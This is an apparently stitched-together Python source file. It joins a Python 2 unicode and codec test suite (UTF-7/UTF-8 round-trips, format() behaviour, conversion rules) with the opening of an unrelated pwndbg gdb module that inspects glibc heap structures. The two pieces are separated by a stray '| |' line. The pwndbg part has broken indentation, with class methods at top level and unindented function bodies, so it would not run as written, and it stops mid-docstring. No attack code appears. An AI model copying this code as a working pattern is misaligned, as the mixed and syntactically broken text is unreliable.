        # Decoding an already-unicode object is an error on CPython.
        self.assertRaises(
            TypeError,
            unicode,
            u'decoding unicode is not supported',
            'utf-8',
            'strict'
        )

    self.assertEqual(
        unicode('strings are decoded to unicode', 'utf-8', 'strict'),
        u'strings are decoded to unicode'
    )

    if not sys.platform.startswith('java'):
        self.assertEqual(
            unicode(
                buffer('character buffers are decoded to unicode'),
                'utf-8',
                'strict'
            ),
            u'character buffers are decoded to unicode'
        )

    self.assertRaises(TypeError, unicode, 42, 42, 42)
def test_codecs_utf7(self):
    """UTF-7 encoding round-trips (RFC 2152 examples) and decode errors."""
    utfTests = [
        (u'A\u2262\u0391.', 'A+ImIDkQ.'),             # RFC2152 example
        (u'Hi Mom -\u263a-!', 'Hi Mom -+Jjo--!'),     # RFC2152 example
        (u'\u65E5\u672C\u8A9E', '+ZeVnLIqe-'),        # RFC2152 example
        (u'Item 3 is \u00a31.', 'Item 3 is +AKM-1.'), # RFC2152 example
        (u'+', '+-'),
        (u'+-', '+--'),
        (u'+?', '+-?'),
        (u'\?', '+AFw?'),
        (u'+?', '+-?'),
        (ur'\\?', '+AFwAXA?'),
        (ur'\\\?', '+AFwAXABc?'),
        (ur'++--', '+-+---')
    ]

    for (x, y) in utfTests:
        self.assertEqual(x.encode('utf-7'), y)

    # surrogates not supported
    self.assertRaises(UnicodeError, unicode, '+3ADYAA-', 'utf-7')

    self.assertEqual(unicode('+3ADYAA-', 'utf-7', 'replace'), u'\ufffd')

    # Issue #2242: crash on some Windows/MSVC versions
    self.assertRaises(UnicodeDecodeError, '+\xc1'.decode, 'utf-7')
def test_codecs_utf8(self):
    """UTF-8 encoding of BMP, surrogate-pair, and lone-surrogate input."""
    self.assertEqual(u''.encode('utf-8'), '')
    self.assertEqual(u'\u20ac'.encode('utf-8'), '\xe2\x82\xac')
    # Surrogate pairs encode as a single 4-byte sequence.
    self.assertEqual(u'\ud800\udc02'.encode('utf-8'), '\xf0\x90\x80\x82')
    self.assertEqual(u'\ud84d\udc56'.encode('utf-8'), '\xf0\xa3\x91\x96')
    # Lone surrogates are encoded as 3-byte sequences (Python 2 behavior).
    self.assertEqual(u'\ud800'.encode('utf-8'), '\xed\xa0\x80')
    self.assertEqual(u'\udc00'.encode('utf-8'), '\xed\xb0\x80')
    self.assertEqual(
        (u'\ud800\udc02'*1000).encode('utf-8'),
        '\xf0\x90\x80\x82'*1000
    )
    self.assertEqual(
        u'\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f'
        u'\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00'
        u'\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c'
        u'\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067'
        u'\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das'
        u' Nunstuck git und'.encode('utf-8'),
        '\xe6\xad\xa3\xe7\xa2\xba\xe3\x81\xab\xe8\xa8\x80\xe3\x81'
        '\x86\xe3\x81\xa8\xe7\xbf\xbb\xe8\xa8\xb3\xe3\x81\xaf\xe3'
        '\x81\x95\xe3\x82\x8c\xe3\x81\xa6\xe3\x81\x84\xe3\x81\xbe'
        '\xe3\x81\x9b\xe3\x82\x93\xe3\x80\x82\xe4\xb8\x80\xe9\x83'
        '\xa8\xe3\x81\xaf\xe3\x83\x89\xe3\x82\xa4\xe3\x83\x84\xe8'
        '\xaa\x9e\xe3\x81\xa7\xe3\x81\x99\xe3\x81\x8c\xe3\x80\x81'
        '\xe3\x81\x82\xe3\x81\xa8\xe3\x81\xaf\xe3\x81\xa7\xe3\x81'
        '\x9f\xe3\x82\x89\xe3\x82\x81\xe3\x81\xa7\xe3\x81\x99\xe3'
        '\x80\x82\xe5\xae\x9f\xe9\x9a\x9b\xe3\x81\xab\xe3\x81\xaf'
        '\xe3\x80\x8cWenn ist das Nunstuck git und'
    )

    # UTF-8 specific decoding tests
    self.assertEqual(unicode('\xf0\xa3\x91\x96', 'utf-8'), u'\U00023456' )
    self.assertEqual(unicode('\xf0\x90\x80\x82', 'utf-8'), u'\U00010002' )
    self.assertEqual(unicode('\xe2\x82\xac', 'utf-8'), u'\u20ac' )

    # Other possible utf-8 test cases:
    # * strict decoding testing for all of the
    #   UTF8_ERROR cases in PyUnicode_DecodeUTF8
def test_codecs_idna(self):
    """IDNA encoding must preserve a trailing dot in the domain name."""
    # Test whether trailing dot is preserved
    self.assertEqual(u"www.python.org.".encode("idna"), "www.python.org.")
def test_codecs_errors(self):
    """Codec error handlers: strict/ignore/replace and bad codec names."""
    # Error handling (encoding)
    self.assertRaises(UnicodeError, u'Andr\202 x'.encode, 'ascii')
    self.assertRaises(UnicodeError, u'Andr\202 x'.encode, 'ascii','strict')
    self.assertEqual(u'Andr\202 x'.encode('ascii','ignore'), "Andr x")
    self.assertEqual(u'Andr\202 x'.encode('ascii','replace'), "Andr? x")

    # Error handling (decoding)
    self.assertRaises(UnicodeError, unicode, 'Andr\202 x', 'ascii')
    self.assertRaises(UnicodeError, unicode, 'Andr\202 x', 'ascii','strict')
    self.assertEqual(unicode('Andr\202 x','ascii','ignore'), u"Andr x")
    self.assertEqual(unicode('Andr\202 x','ascii','replace'), u'Andr\uFFFD x')

    # Error handling (unknown character names)
    self.assertEqual("\\N{foo}xx".decode("unicode-escape", "ignore"), u"xx")

    # Error handling (truncated escape sequence)
    self.assertRaises(UnicodeError, "\\".decode, "unicode-escape")

    # Unknown/broken codec names must raise TypeError here.
    self.assertRaises(TypeError, "hello".decode, "test.unicode1")
    self.assertRaises(TypeError, unicode, "hello", "test.unicode2")
    self.assertRaises(TypeError, u"hello".encode, "test.unicode1")
    self.assertRaises(TypeError, u"hello".encode, "test.unicode2")
    # executes PyUnicode_Encode()
    import imp
    self.assertRaises(
        ImportError,
        imp.find_module,
        "non-existing module",
        [u"non-existing dir"]
    )

    # Error handling (wrong arguments)
    self.assertRaises(TypeError, u"hello".encode, 42, 42, 42)

    # Error handling (PyUnicode_EncodeDecimal())
    self.assertRaises(UnicodeError, int, u"\u0200")
def test_codecs(self):
    """Round-trip safety of the standard codecs over character ranges."""
    # Encoding
    self.assertEqual(u'hello'.encode('ascii'), 'hello')
    self.assertEqual(u'hello'.encode('utf-7'), 'hello')
    self.assertEqual(u'hello'.encode('utf-8'), 'hello')
    self.assertEqual(u'hello'.encode('utf8'), 'hello')
    self.assertEqual(u'hello'.encode('utf-16-le'), 'h\000e\000l\000l\000o\000')
    self.assertEqual(u'hello'.encode('utf-16-be'), '\000h\000e\000l\000l\000o')
    self.assertEqual(u'hello'.encode('latin-1'), 'hello')

    # Roundtrip safety for BMP (just the first 1024 chars)
    for c in xrange(1024):
        u = unichr(c)
        for encoding in ('utf-7', 'utf-8', 'utf-16', 'utf-16-le',
                         'utf-16-be', 'raw_unicode_escape',
                         'unicode_escape', 'unicode_internal'):
            self.assertEqual(unicode(u.encode(encoding),encoding), u)

    # Roundtrip safety for BMP (just the first 256 chars)
    for c in xrange(256):
        u = unichr(c)
        for encoding in ('latin-1',):
            self.assertEqual(unicode(u.encode(encoding),encoding), u)

    # Roundtrip safety for BMP (just the first 128 chars)
    for c in xrange(128):
        u = unichr(c)
        for encoding in ('ascii',):
            self.assertEqual(unicode(u.encode(encoding),encoding), u)

    # Roundtrip safety for non-BMP (just a few chars)
    u = u'\U00010001\U00020002\U00030003\U00040004\U00050005'
    for encoding in ('utf-8', 'utf-16', 'utf-16-le', 'utf-16-be',
                     #'raw_unicode_escape',
                     'unicode_escape', 'unicode_internal'):
        self.assertEqual(unicode(u.encode(encoding),encoding), u)

    # UTF-8 must be roundtrip safe for all UCS-2 code points
    # This excludes surrogates: in the full range, there would be
    # a surrogate pair (\udbff\udc00), which gets converted back
    # to a non-BMP character (\U0010fc00)
    u = u''.join(map(unichr, range(0,0xd800)+range(0xe000,0x10000)))
    for encoding in ('utf-8',):
        self.assertEqual(unicode(u.encode(encoding),encoding), u)
def test_codecs_charmap(self):
    """Round-trip safety of the charmap codecs for bytes 0-127 and 128-255."""
    # 0-127
    s = ''.join(map(chr, xrange(128)))
    for encoding in (
        'cp037', 'cp1026',
        'cp437', 'cp500', 'cp737', 'cp775', 'cp850',
        'cp852', 'cp855', 'cp860', 'cp861', 'cp862',
        'cp863', 'cp865', 'cp866',
        'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
        'iso8859_2', 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6',
        'iso8859_7', 'iso8859_9', 'koi8_r', 'latin_1',
        'mac_cyrillic', 'mac_latin2',

        'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
        'cp1256', 'cp1257', 'cp1258',
        'cp856', 'cp857', 'cp864', 'cp869', 'cp874',

        'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
        'cp1006', 'iso8859_8',

        ### These have undefined mappings:
        #'cp424',

        ### These fail the round-trip:
        #'cp875'

        ):
        self.assertEqual(unicode(s, encoding).encode(encoding), s)

    # 128-255
    s = ''.join(map(chr, xrange(128, 256)))
    for encoding in (
        'cp037', 'cp1026',
        'cp437', 'cp500', 'cp737', 'cp775', 'cp850',
        'cp852', 'cp855', 'cp860', 'cp861', 'cp862',
        'cp863', 'cp865', 'cp866',
        'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
        'iso8859_2', 'iso8859_4', 'iso8859_5',
        'iso8859_9', 'koi8_r', 'latin_1',
        'mac_cyrillic', 'mac_latin2',

        ### These have undefined mappings:
        #'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
        #'cp1256', 'cp1257', 'cp1258',
        #'cp424', 'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
        #'iso8859_3', 'iso8859_6', 'iso8859_7',
        #'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',

        ### These fail the round-trip:
        #'cp1006', 'cp875', 'iso8859_8',

        ):
        self.assertEqual(unicode(s, encoding).encode(encoding), s)
def test_concatenation(self):
    """Adjacent string literal concatenation with mixed str/unicode."""
    self.assertEqual((u"abc" u"def"), u"abcdef")
    self.assertEqual(("abc" u"def"), u"abcdef")
    self.assertEqual((u"abc" "def"), u"abcdef")
    self.assertEqual((u"abc" u"def" "ghi"), u"abcdefghi")
    self.assertEqual(("abc" "def" u"ghi"), u"abcdefghi")
def test_printing(self):
    """print >>file with unicode operands must not raise."""
    # Sink that accepts writes and discards them.
    class BitBucket:
        def write(self, text):
            pass

    out = BitBucket()
    print >>out, u'abc'
    print >>out, u'abc', u'def'
    print >>out, u'abc', 'def'
    print >>out, 'abc', u'def'
    print >>out, u'abc\n'
    print >>out, u'abc\n',
    print >>out, u'abc\n',
    print >>out, u'def\n'
    print >>out, u'def\n'
def test_ucs4(self):
    """raw-unicode-escape round-trips for non-BMP code points."""
    x = u'\U00100000'
    y = x.encode("raw-unicode-escape").decode("raw-unicode-escape")
    self.assertEqual(x, y)

    y = r'\U00100000'
    x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
    self.assertEqual(x, y)
    y = r'\U00010000'
    x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
    self.assertEqual(x, y)

    # Out-of-range \U escape: the error must span the whole escape.
    try:
        '\U11111111'.decode("raw-unicode-escape")
    except UnicodeDecodeError as e:
        self.assertEqual(e.start, 0)
        self.assertEqual(e.end, 10)
    else:
        self.fail("Should have raised UnicodeDecodeError")
def test_conversion(self):
    """unicode() conversion precedence: __unicode__ before __str__."""
    # Make sure __unicode__() works properly
    class Foo0:
        def __str__(self):
            return "foo"

    class Foo1:
        def __unicode__(self):
            return u"foo"

    class Foo2(object):
        def __unicode__(self):
            return u"foo"

    class Foo3(object):
        def __unicode__(self):
            return "foo"

    class Foo4(str):
        def __unicode__(self):
            return "foo"

    class Foo5(unicode):
        def __unicode__(self):
            return "foo"

    class Foo6(str):
        def __str__(self):
            return "foos"
        def __unicode__(self):
            return u"foou"

    class Foo7(unicode):
        def __str__(self):
            return "foos"
        def __unicode__(self):
            return u"foou"

    class Foo8(unicode):
        def __new__(cls, content=""):
            return unicode.__new__(cls, 2*content)
        def __unicode__(self):
            return self

    class Foo9(unicode):
        def __str__(self):
            return "string"
        def __unicode__(self):
            return "not unicode"

    self.assertEqual(unicode(Foo0()), u"foo")
    self.assertEqual(unicode(Foo1()), u"foo")
    self.assertEqual(unicode(Foo2()), u"foo")
    self.assertEqual(unicode(Foo3()), u"foo")
    # __unicode__ wins over the instances' own string content.
    self.assertEqual(unicode(Foo4("bar")), u"foo")
    self.assertEqual(unicode(Foo5("bar")), u"foo")
    self.assertEqual(unicode(Foo6("bar")), u"foou")
    self.assertEqual(unicode(Foo7("bar")), u"foou")
    self.assertEqual(unicode(Foo8("foo")), u"foofoo")
    self.assertEqual(str(Foo9("foo")), "string")
    self.assertEqual(unicode(Foo9("foo")), u"not unicode")
def test_unicode_repr(self):
    """repr() may be defined to return either a str or a unicode object."""
    class s1:
        def __repr__(self):
            return '\\n'

    class s2:
        def __repr__(self):
            return u'\\n'

    self.assertEqual(repr(s1()), '\\n')
    self.assertEqual(repr(s2()), '\\n')
def test_expandtabs_overflows_gracefully(self):
    """expandtabs(sys.maxint) must raise OverflowError on 32-bit builds."""
    # This test only affects 32-bit platforms because expandtabs can only take
    # an int as the max value, not a 64-bit C long.  If expandtabs is changed
    # to take a 64-bit long, this test should apply to all platforms.
    if sys.maxint > (1 << 32) or struct.calcsize('P') != 4:
        return
    self.assertRaises(OverflowError, u't\tt\t'.expandtabs, sys.maxint)
def test__format__(self):
    """unicode.__format__ with width, precision, fill, and alignment."""
    def test(value, format, expected):
        # test both with and without the trailing 's'
        self.assertEqual(value.__format__(format), expected)
        self.assertEqual(value.__format__(format + u's'), expected)

    test(u'', u'', u'')
    test(u'abc', u'', u'abc')
    test(u'abc', u'.3', u'abc')
    test(u'ab', u'.3', u'ab')
    test(u'abcdef', u'.3', u'abc')
    test(u'abcdef', u'.0', u'')
    test(u'abc', u'3.3', u'abc')
    test(u'abc', u'2.3', u'abc')
    test(u'abc', u'2.2', u'ab')
    test(u'abc', u'3.2', u'ab ')
    test(u'result', u'x<0', u'result')
    test(u'result', u'x<5', u'result')
    test(u'result', u'x<6', u'result')
    test(u'result', u'x<7', u'resultx')
    test(u'result', u'x<8', u'resultxx')
    test(u'result', u' <7', u'result ')
    test(u'result', u'<7', u'result ')
    test(u'result', u'>7', u' result')
    test(u'result', u'>8', u'  result')
    test(u'result', u'^8', u' result ')
    test(u'result', u'^9', u' result  ')
    test(u'result', u'^10', u'  result  ')
    test(u'a', u'10000', u'a' + u' ' * 9999)
    test(u'', u'10000', u' ' * 10000)
    test(u'', u'10000000', u' ' * 10000000)

    # test mixing unicode and str
    self.assertEqual(u'abc'.__format__('s'), u'abc')
    self.assertEqual(u'abc'.__format__('->10s'), u'-------abc')
def test_format(self):
    """str.format() with unicode: fields, specs, errors, and coercion."""
    self.assertEqual(u''.format(), u'')
    self.assertEqual(u'a'.format(), u'a')
    self.assertEqual(u'ab'.format(), u'ab')
    self.assertEqual(u'a{{'.format(), u'a{')
    self.assertEqual(u'a}}'.format(), u'a}')
    self.assertEqual(u'{{b'.format(), u'{b')
    self.assertEqual(u'}}b'.format(), u'}b')
    self.assertEqual(u'a{{b'.format(), u'a{b')

    # examples from the PEP:
    import datetime
    self.assertEqual(u"My name is {0}".format(u'Fred'), u"My name is Fred")
    self.assertEqual(u"My name is {0[name]}".format(dict(name=u'Fred')),
                     u"My name is Fred")
    self.assertEqual(u"My name is {0} :-{{}}".format(u'Fred'),
                     u"My name is Fred :-{}")

    # datetime.__format__ doesn't work with unicode
    #d = datetime.date(2007, 8, 18)
    #self.assertEqual("The year is {0.year}".format(d),
    #                 "The year is 2007")

    # classes we'll use for testing
    class C:
        def __init__(self, x=100):
            self._x = x
        def __format__(self, spec):
            return spec

    class D:
        def __init__(self, x):
            self.x = x
        def __format__(self, spec):
            return str(self.x)

    # class with __str__, but no __format__
    class E:
        def __init__(self, x):
            self.x = x
        def __str__(self):
            return u'E(' + self.x + u')'

    # class with __repr__, but no __format__ or __str__
    class F:
        def __init__(self, x):
            self.x = x
        def __repr__(self):
            return u'F(' + self.x + u')'

    # class with __format__ that forwards to string, for some format_spec's
    class G:
        def __init__(self, x):
            self.x = x
        def __str__(self):
            return u"string is " + self.x
        def __format__(self, format_spec):
            if format_spec == 'd':
                return u'G(' + self.x + u')'
            return object.__format__(self, format_spec)

    # class that returns a bad type from __format__
    class H:
        def __format__(self, format_spec):
            return 1.0

    class I(datetime.date):
        def __format__(self, format_spec):
            return self.strftime(format_spec)

    class J(int):
        def __format__(self, format_spec):
            return int.__format__(self * 2, format_spec)

    self.assertEqual(u''.format(), u'')
    self.assertEqual(u'abc'.format(), u'abc')
    self.assertEqual(u'{0}'.format(u'abc'), u'abc')
    self.assertEqual(u'{0:}'.format(u'abc'), u'abc')
    self.assertEqual(u'X{0}'.format(u'abc'), u'Xabc')
    self.assertEqual(u'{0}X'.format(u'abc'), u'abcX')
    self.assertEqual(u'X{0}Y'.format(u'abc'), u'XabcY')
    self.assertEqual(u'{1}'.format(1, u'abc'), u'abc')
    self.assertEqual(u'X{1}'.format(1, u'abc'), u'Xabc')
    self.assertEqual(u'{1}X'.format(1, u'abc'), u'abcX')
    self.assertEqual(u'X{1}Y'.format(1, u'abc'), u'XabcY')
    self.assertEqual(u'{0}'.format(-15), u'-15')
    self.assertEqual(u'{0}{1}'.format(-15, u'abc'), u'-15abc')
    self.assertEqual(u'{0}X{1}'.format(-15, u'abc'), u'-15Xabc')
    self.assertEqual(u'{{'.format(), u'{')
    self.assertEqual(u'}}'.format(), u'}')
    self.assertEqual(u'{{}}'.format(), u'{}')
    self.assertEqual(u'{{x}}'.format(), u'{x}')
    self.assertEqual(u'{{{0}}}'.format(123), u'{123}')
    self.assertEqual(u'{{{{0}}}}'.format(), u'{{0}}')
    self.assertEqual(u'}}{{'.format(), u'}{')
    self.assertEqual(u'}}x{{'.format(), u'}x{')

    # weird field names
    self.assertEqual(u"{0[foo-bar]}".format({u'foo-bar':u'baz'}), u'baz')
    self.assertEqual(u"{0[foo bar]}".format({u'foo bar':u'baz'}), u'baz')
    self.assertEqual(u"{0[ ]}".format({u' ':3}), u'3')

    # attribute and index access in field names
    self.assertEqual(u'{foo._x}'.format(foo=C(20)), u'20')
    self.assertEqual(u'{1}{0}'.format(D(10), D(20)), u'2010')
    self.assertEqual(u'{0._x.x}'.format(C(D(u'abc'))), u'abc')
    self.assertEqual(u'{0[0]}'.format([u'abc', u'def']), u'abc')
    self.assertEqual(u'{0[1]}'.format([u'abc', u'def']), u'def')
    self.assertEqual(u'{0[1][0]}'.format([u'abc', [u'def']]), u'def')
    self.assertEqual(u'{0[1][0].x}'.format(['abc', [D(u'def')]]), u'def')

    # strings
    self.assertEqual(u'{0:.3s}'.format(u'abc'), u'abc')
    self.assertEqual(u'{0:.3s}'.format(u'ab'), u'ab')
    self.assertEqual(u'{0:.3s}'.format(u'abcdef'), u'abc')
    self.assertEqual(u'{0:.0s}'.format(u'abcdef'), u'')
    self.assertEqual(u'{0:3.3s}'.format(u'abc'), u'abc')
    self.assertEqual(u'{0:2.3s}'.format(u'abc'), u'abc')
    self.assertEqual(u'{0:2.2s}'.format(u'abc'), u'ab')
    self.assertEqual(u'{0:3.2s}'.format(u'abc'), u'ab ')
    self.assertEqual(u'{0:x<0s}'.format(u'result'), u'result')
    self.assertEqual(u'{0:x<5s}'.format(u'result'), u'result')
    self.assertEqual(u'{0:x<6s}'.format(u'result'), u'result')
    self.assertEqual(u'{0:x<7s}'.format(u'result'), u'resultx')
    self.assertEqual(u'{0:x<8s}'.format(u'result'), u'resultxx')
    self.assertEqual(u'{0: <7s}'.format(u'result'), u'result ')
    self.assertEqual(u'{0:<7s}'.format(u'result'), u'result ')
    self.assertEqual(u'{0:>7s}'.format(u'result'), u' result')
    self.assertEqual(u'{0:>8s}'.format(u'result'), u'  result')
    self.assertEqual(u'{0:^8s}'.format(u'result'), u' result ')
    self.assertEqual(u'{0:^9s}'.format(u'result'), u' result  ')
    self.assertEqual(u'{0:^10s}'.format(u'result'), u'  result  ')
    self.assertEqual(u'{0:10000}'.format(u'a'), u'a' + u' ' * 9999)
    self.assertEqual(u'{0:10000}'.format(u''), u' ' * 10000)
    self.assertEqual(u'{0:10000000}'.format(u''), u' ' * 10000000)

    # format specifiers for user defined type
    self.assertEqual(u'{0:abc}'.format(C()), u'abc')

    # !r and !s coersions
    self.assertEqual(u'{0!s}'.format(u'Hello'), u'Hello')
    self.assertEqual(u'{0!s:}'.format(u'Hello'), u'Hello')
    self.assertEqual(u'{0!s:15}'.format(u'Hello'), u'Hello          ')
    self.assertEqual(u'{0!s:15s}'.format(u'Hello'), u'Hello          ')
    self.assertEqual(u'{0!r}'.format(u'Hello'), u"u'Hello'")
    self.assertEqual(u'{0!r:}'.format(u'Hello'), u"u'Hello'")
    self.assertEqual(u'{0!r}'.format(F(u'Hello')), u'F(Hello)')

    # test fallback to object.__format__
    self.assertEqual(u'{0}'.format({}), u'{}')
    self.assertEqual(u'{0}'.format([]), u'[]')
    self.assertEqual(u'{0}'.format([1]), u'[1]')
    self.assertEqual(u'{0}'.format(E(u'data')), u'E(data)')
    self.assertEqual(u'{0:^10}'.format(E(u'data')), u' E(data)  ')
    self.assertEqual(u'{0:^10s}'.format(E(u'data')), u' E(data)  ')
    self.assertEqual(u'{0:d}'.format(G(u'data')), u'G(data)')
    self.assertEqual(u'{0:>15s}'.format(G(u'data')), u' string is data')
    self.assertEqual(u'{0!s}'.format(G(u'data')), u'string is data')

    self.assertEqual("{0:date: %Y-%m-%d}".format(I(year=2007,
                                                   month=8,
                                                   day=27)),
                     "date: 2007-08-27")

    # test deriving from a builtin type and overriding __format__
    self.assertEqual("{0}".format(J(10)), "20")

    # string format specifiers
    self.assertEqual('{0:}'.format('a'), 'a')

    # computed format specifiers
    self.assertEqual("{0:.{1}}".format('hello world', 5), 'hello')
    self.assertEqual("{0:.{1}s}".format('hello world', 5), 'hello')
    self.assertEqual("{0:.{precision}s}".format('hello world', precision=5), 'hello')
    self.assertEqual("{0:{width}.{precision}s}".format('hello world', width=10, precision=5), 'hello     ')
    self.assertEqual("{0:{width}.{precision}s}".format('hello world', width='10', precision='5'), 'hello     ')

    # test various errors
    self.assertRaises(ValueError, '{'.format)
    self.assertRaises(ValueError, '}'.format)
    self.assertRaises(ValueError, 'a{'.format)
    self.assertRaises(ValueError, 'a}'.format)
    self.assertRaises(ValueError, '{a'.format)
    self.assertRaises(ValueError, '}a'.format)
    self.assertRaises(IndexError, '{0}'.format)
    self.assertRaises(IndexError, '{1}'.format, 'abc')
    self.assertRaises(KeyError,   '{x}'.format)
    self.assertRaises(ValueError, "}{".format)
    self.assertRaises(ValueError, "{".format)
    self.assertRaises(ValueError, "}".format)
    self.assertRaises(ValueError, "abc{0:{}".format)
    self.assertRaises(ValueError, "{0".format)
    self.assertRaises(IndexError, "{0.}".format)
    self.assertRaises(ValueError, "{0.}".format, 0)
    self.assertRaises(IndexError, "{0[}".format)
    self.assertRaises(ValueError, "{0[}".format, [])
    self.assertRaises(KeyError,   "{0]}".format)
    self.assertRaises(ValueError, "{0.[]}".format, 0)
    self.assertRaises(ValueError, "{0..foo}".format, 0)
    self.assertRaises(ValueError, "{0[0}".format, 0)
    self.assertRaises(ValueError, "{0[0:foo}".format, 0)
    self.assertRaises(KeyError,   "{c]}".format)
    self.assertRaises(ValueError, "{{ {{{0}}".format, 0)
    self.assertRaises(ValueError, "{0}}".format, 0)
    self.assertRaises(KeyError,   "{foo}".format, bar=3)
    self.assertRaises(ValueError, "{0!x}".format, 3)
    self.assertRaises(ValueError, "{0!}".format, 0)
    self.assertRaises(ValueError, "{0!rs}".format, 0)
    self.assertRaises(ValueError, "{!}".format)
    self.assertRaises(ValueError, "{:}".format)
    self.assertRaises(ValueError, "{:s}".format)
    self.assertRaises(ValueError, "{}".format)

    # can't have a replacement on the field name portion
    self.assertRaises(TypeError, '{0[{1}]}'.format, 'abcdefg', 4)

    # exceed maximum recursion depth
    self.assertRaises(ValueError, "{0:{1:{2}}}".format, 'abc', 's', '')
    self.assertRaises(ValueError, "{0:{1:{2:{3:{4:{5:{6}}}}}}}".format,
                      0, 1, 2, 3, 4, 5, 6, 7)

    # string format spec errors
    self.assertRaises(ValueError, "{0:-s}".format, '')
    self.assertRaises(ValueError, format, "", "-")
    self.assertRaises(ValueError, "{0:=s}".format, '')

    # test combining string and unicode
    self.assertEqual(u"foo{0}".format('bar'), u'foobar')
    # This will try to convert the argument from unicode to str, which
    #  will succeed
    self.assertEqual("foo{0}".format(u'bar'), 'foobar')
    # This will try to convert the argument from unicode to str, which
    #  will fail
    self.assertRaises(UnicodeEncodeError, "foo{0}".format, u'\u1000bar')
def test_raiseMemError(self):
    """A failed huge allocation must raise MemoryError, twice, cleanly."""
    # Ensure that the freelist contains a consistent object, even
    # when a string allocation fails with a MemoryError.
    # This used to crash the interpreter,
    # or leak references when the number was smaller.
    charwidth = 4 if sys.maxunicode >= 0x10000 else 2
    # Note: sys.maxsize is half of the actual max allocation because of
    # the signedness of Py_ssize_t.
    alloc = lambda: u"a" * (sys.maxsize // charwidth * 2)
    self.assertRaises(MemoryError, alloc)
    self.assertRaises(MemoryError, alloc)
def test_main():
    """Run all test cases defined in this module via test_support."""
    test_support.run_unittest(__name__)

if __name__ == "__main__":
    test_main()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
import gdb
import pwndbg.events
import pwndbg.typeinfo
from pwndbg.color import bold
from pwndbg.color import red
from pwndbg.constants import ptmalloc
class Heap(pwndbg.heap.heap.BaseHeap):
def __init__(self):
    # Global ptmalloc objects, resolved lazily by the properties below.
    self._main_arena = None  # cached gdb value for glibc's main_arena
    self._mp = None          # cached gdb value for glibc's mp_ (malloc_par)
@property
def main_arena(self):
    """Return glibc's main arena as a ``malloc_state`` gdb value.

    Re-resolves the ``main_arena`` symbol on every access and caches the
    result in ``self._main_arena``.  When the symbol cannot be resolved
    (e.g. libc debug symbols are missing), prints a hint and returns the
    previously cached value, which may be ``None``.
    """
    main_arena_addr = pwndbg.symbol.address('main_arena')

    if main_arena_addr is not None:
        self._main_arena = pwndbg.memory.poi(self.malloc_state, main_arena_addr)
    else:
        # Fix: the symbol is spelled 'main_arena', not 'main arena' —
        # report the name the user must actually look for.
        print(bold(red('Symbol \'main_arena\' not found. Try installing libc '
                       'debugging symbols and try again.')))

    return self._main_arena
@property
def mp(self):
    """Return glibc's ``mp_`` (malloc_par) as a gdb value, caching it.

    If the ``mp_`` symbol cannot be resolved, the previously cached
    value (possibly ``None``) is returned unchanged.
    """
    address = pwndbg.symbol.address('mp_')
    if address is not None:
        self._mp = pwndbg.memory.poi(self.malloc_par, address)
    return self._mp
@property
def global_max_fast(self):
    """Address of glibc's ``global_max_fast`` symbol (``None`` if unresolved)."""
    return pwndbg.symbol.address('global_max_fast')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_chunk(self):
    """gdb type for ``struct malloc_chunk`` (re-resolved per objfile)."""
    return pwndbg.typeinfo.load('struct malloc_chunk')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_state(self):
    """gdb type for ``struct malloc_state`` (re-resolved per objfile)."""
    return pwndbg.typeinfo.load('struct malloc_state')
@property
@pwndbg.memoize.reset_on_objfile
def mallinfo(self):
    """gdb type for ``struct mallinfo`` (re-resolved per objfile)."""
    return pwndbg.typeinfo.load('struct mallinfo')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_par(self):
    """gdb type for ``struct malloc_par`` (re-resolved per objfile)."""
    return pwndbg.typeinfo.load('struct malloc_par')
@property
@pwndbg.memoize.reset_on_objfile
def malloc_alignment(self):
    """Chunk alignment used by ptmalloc: two pointer widths."""
    return pwndbg.arch.ptrsize * 2
@property
@pwndbg.memoize.reset_on_objfile
def min_chunk_size(self):
    """Smallest possible chunk size: four pointer widths."""
    return pwndbg.arch.ptrsize * 4
def _spaces_table(self):
    """Build the bin-spacing table, indexed from 1 (index 0 is unused).

    Entries give the size spacing between consecutive bins, laid out as
    runs of (bin count, spacing) mirroring glibc's bin layout.
    """
    # (count, spacing) runs; see:
    # https://bazaar.launchpad.net/~ubuntu-branches/ubuntu/trusty/eglibc/trusty-security/view/head:/malloc/malloc.c#L1356
    runs = (
        (64, pwndbg.arch.ptrsize * 2),
        (32, 2 ** 6),
        (16, 2 ** 9),
        (8,  2 ** 12),
        (4,  2 ** 15),
        (2,  2 ** 18),
        (1,  2 ** 21),
    )

    # There is no index 0.
    table = [None]
    for count, spacing in runs:
        table.extend([spacing] * count)

    # Fix up the slop in bin spacing (part of libc - they made
    # the trade off of some slop for speed).
    if pwndbg.arch.ptrsize == 8:
        for index, spacing in ((97, 64), (98, 448), (113, 1536),
                               (121, 24576), (125, 98304)):
            table[index] = spacing

    return table
def chunk_flags(self, size):
return ( size & ptmalloc.PREV_INUSE ,
size & ptmalloc.IS_MMAPPED,
size & ptmalloc.NON_MAIN_ARENA )
def chunk_key_offset(self, key):
"""
Finds the index of a field in the malloc_chunk struct.
64 bit example.)
prev_size == 0
size == 8
fd == 16
bk == 24
...
"""
chunk_keys = self.malloc_chunk.keys()
try:
return chunk_keys.index(key) * pwndbg.arch.ptrsize
except:
return None
def get_arena(self, arena_addr=None):
if arena_addr is None:
return self.main_arena
return pwndbg.memory.poi(self.malloc_state, arena_addr)
def get_bounds(self):
"""
Finds the heap bounds by using mp_ structure's sbrk_base property
